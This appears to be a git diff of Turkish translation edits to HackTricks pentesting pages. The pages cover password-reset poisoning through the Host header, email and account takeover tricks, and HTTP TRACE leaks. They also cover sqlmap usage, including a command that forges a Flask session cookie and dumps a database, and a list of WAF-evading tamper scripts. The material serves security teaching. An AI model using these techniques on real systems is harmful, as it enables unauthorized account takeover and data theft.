Birçok kez arka uç, bazı işlemleri gerçekleştirmek için **Host başlığını** güvenilir olarak kabul eder. Örneğin, bu değeri **şifre sıfırlamak için kullanılacak alan adı** olarak kullanabilir. Yani, şifrenizi sıfırlamak için bir bağlantı içeren bir e-posta aldığınızda, kullanılan alan adı Host başlığına koyduğunuz o alandır. Ardından, diğer kullanıcıların şifre sıfırlama taleplerini yapabilir ve alan adını kontrolünüz altındaki bir alan adıyla değiştirerek şifre sıfırlama kodlarını çalabilirsiniz. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
{% hint style="warning" %}
Kullanıcının şifre sıfırlama bağlantısına tıklamasını beklemenize gerek olmadığını unutmayın, çünkü belki de **spam filtreleri veya diğer ara cihazlar/botlar bunu analiz etmek için tıklayacaktır**.
Kullanıcının şifre sıfırlama bağlantısına tıklamasını beklemenize gerek olmadığını unutmayın; belki de **spam filtreleri veya diğer ara cihazlar/botlar bunu analiz etmek için tıklayacaktır**.
{% endhint %}
### Oturum boolean'ları
Bazen bazı doğrulamaları doğru tamamladığınızda arka uç, **oturumunuza bir güvenlik niteliğine "True" değeri ekler**. Ardından, farklı bir uç nokta bu kontrolü başarıyla geçip geçmediğinizi bilecektir.\
Bazen bazı doğrulamaları doğru bir şekilde tamamladığınızda arka uç, **oturumunuza bir güvenlik niteliği olarak "True" değeri ekler**. Ardından, farklı bir uç nokta bu kontrolü başarıyla geçip geçmediğinizi bilecektir.\
Ancak, eğer **kontrolü geçerseniz** ve oturumunuza güvenlik niteliğinde "True" değeri verilirse, **aynı niteliğe bağlı olan diğer kaynaklara erişmeyi** deneyebilirsiniz, ancak **erişim izniniz olmamalıdır**. [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
### Kayıt işlevselliği
@ -40,7 +40,7 @@ Zaten mevcut bir kullanıcı olarak kaydolmayı deneyin. Eşdeğer karakterler (
### E-postaları ele geçirme
Bir e-posta kaydedin, onaylamadan önce e-postayı değiştirin, ardından, yeni onay e-postası ilk kaydedilen e-postaya gönderilirse, herhangi bir e-postayı ele geçirebilirsiniz. Ya da ikinci e-postayı birinciyi onaylayacak şekilde etkinleştirebilirseniz, herhangi bir hesabı da ele geçirebilirsiniz.
Bir e-posta kaydedin, onaylamadan önce e-postayı değiştirin, ardından yeni onay e-postası ilk kaydedilen e-postaya gönderilirse, herhangi bir e-postayı ele geçirebilirsiniz. Ya da ikinci e-postayı birincisini onaylayacak şekilde etkinleştirebilirseniz, herhangi bir hesabı da ele geçirebilirsiniz.
### Atlassian kullanan şirketlerin İç Servis Masasına Erişim
@ -48,14 +48,14 @@ Bir e-posta kaydedin, onaylamadan önce e-postayı değiştirin, ardından, yeni
### TRACE yöntemi
Geliştiriciler, üretim ortamında çeşitli hata ayıklama seçeneklerini devre dışı bırakmayı unutabilir. Örneğin, HTTP `TRACE` yöntemi tanısal amaçlar için tasarlanmıştır. Eğer etkinse, web sunucusu `TRACE` yöntemini kullanan isteklere, alınan isteği yanıtında yankılayarak yanıt verecektir. Bu davranış genellikle zararsızdır, ancak bazen, ters proxyler tarafından isteklere eklenebilecek dahili kimlik doğrulama başlıklarının adları gibi bilgi sızmasına yol açabilir.![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
Geliştiriciler, üretim ortamında çeşitli hata ayıklama seçeneklerini devre dışı bırakmayı unutabilir. Örneğin, HTTP `TRACE` yöntemi tanısal amaçlar için tasarlanmıştır. Eğer etkinse, web sunucusu `TRACE` yöntemini kullanan isteklere, alınan isteği yanıtında yankılayarak yanıt verecektir. Bu davranış genellikle zararsızdır, ancak bazen ters proxy'ler tarafından isteklere eklenebilecek dahili kimlik doğrulama başlıklarının adları gibi bilgi sızmasına yol açabilir.![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
![Image for post](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -68,7 +68,7 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip edin.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Hacking hilelerini paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
</details>

View file

@ -9,15 +9,15 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip edin.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
</details>
{% endhint %}
<figure><img src="../../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; keşiften raporlamaya kadar. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -41,7 +41,7 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char
```
### Bilgi Alımı
### Bilgi Alma
#### Dahili
```bash
@ -98,7 +98,7 @@ sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
```
### Eval
**Sqlmap**, her yükü göndermeden önce bazı python tek satırları ile işlemek için `-e` veya `--eval` kullanımına izin verir. Bu, yükü göndermeden önce özel yollarla işlemek için çok kolay ve hızlı hale getirir. Aşağıdaki örnekte **flask çerez oturumu** **göndermeden önce bilinen bir anahtar ile flask tarafından imzalanmıştır**:
**Sqlmap**, her yükü göndermeden önce bazı python tek satırlık kodları ile işlemek için `-e` veya `--eval` kullanımına izin verir. Bu, yükü göndermeden önce özel yollarla işlemek için çok kolay ve hızlı hale getirir. Aşağıdaki örnekte **flask çerez oturumu** **göndermeden önce flask tarafından bilinen bir anahtar ile imzalanmıştır**:
```bash
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
```
@ -182,9 +182,9 @@ Unutmayın ki **kendi tamper'ınızı python ile oluşturabilirsiniz** ve bu ço
| overlongutf8.py | Verilen payload'daki tüm karakterleri dönüştürür (zaten kodlanmış olanları işlememektedir) |
| randomcase.py | Her anahtar kelime karakterini rastgele büyük/küçük harf değeri ile değiştirir |
| randomcomments.py | SQL anahtar kelimelerine rastgele yorumlar ekler |
| securesphere.py | Özel olarak hazırlanmış bir dize ekler |
| securesphere.py | Özel olarak hazırlanmış bir dize ekler |
| sp\_password.py | Payload'un sonuna 'sp\_password' ekler, böylece DBMS günlüklerinden otomatik olarak gizlenir |
| space2comment.py | Boşluk karakterini (' ') yorumlarla değiştirir |
| space2comment.py | Boşluk karakterini (' ') yorumlarla değiştirir |
| space2dash.py | Boşluk karakterini (' ') bir tire yorumu ('--') ile değiştirir, ardından rastgele bir dize ve yeni bir satır ('\n') ekler |
| space2hash.py | Boşluk karakterini (' ') bir pound karakteri ('#') ile değiştirir, ardından rastgele bir dize ve yeni bir satır ('\n') ekler |
| space2morehash.py | Boşluk karakterini (' ') bir pound karakteri ('#') ile değiştirir, ardından rastgele bir dize ve yeni bir satır ('\n') ekler |
@ -196,16 +196,16 @@ Unutmayın ki **kendi tamper'ınızı python ile oluşturabilirsiniz** ve bu ço
| space2randomblank.py | Boşluk karakterini (' ') geçerli alternatif karakterler setinden rastgele bir boş karakter ile değiştirir |
| symboliclogical.py | AND ve OR mantıksal operatörlerini sembolik karşılıkları ile değiştirir (&& ve |
| unionalltounion.py | UNION ALL SELECT'i UNION SELECT ile değiştirir |
| unmagicquotes.py | Alıntı karakterini (') çok baytlı kombinasyon %bf%27 ile değiştirir, ardından sonunda genel bir yorum ekler (çalışması için) |
| unmagicquotes.py | Alıntı karakterini (') çok baytlı bir kombinasyon %bf%27 ile değiştirir, ardından sonunda genel bir yorum ekler (çalışması için) |
| uppercase.py | Her anahtar kelime karakterini büyük harf değeri 'INSERT' ile değiştirir |
| varnish.py | 'X-originating-IP' HTTP başlığını ekler |
| varnish.py | Bir HTTP başlığı 'X-originating-IP' ekler |
| versionedkeywords.py | Her işlev olmayan anahtar kelimeyi versiyonlu MySQL yorumu ile sarar |
| versionedmorekeywords.py | Her anahtar kelimeyi versiyonlu MySQL yorumu ile sarar |
| xforwardedfor.py | Sahte bir HTTP başlığı 'X-Forwarded-For' ekler |
<figure><img src="../../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest çalıştırın; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ları değiştirmiyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ları değiştirmiyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -219,7 +219,7 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
* **Hacking ipuçlarını paylaşmak için [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.**
</details>
{% endhint %}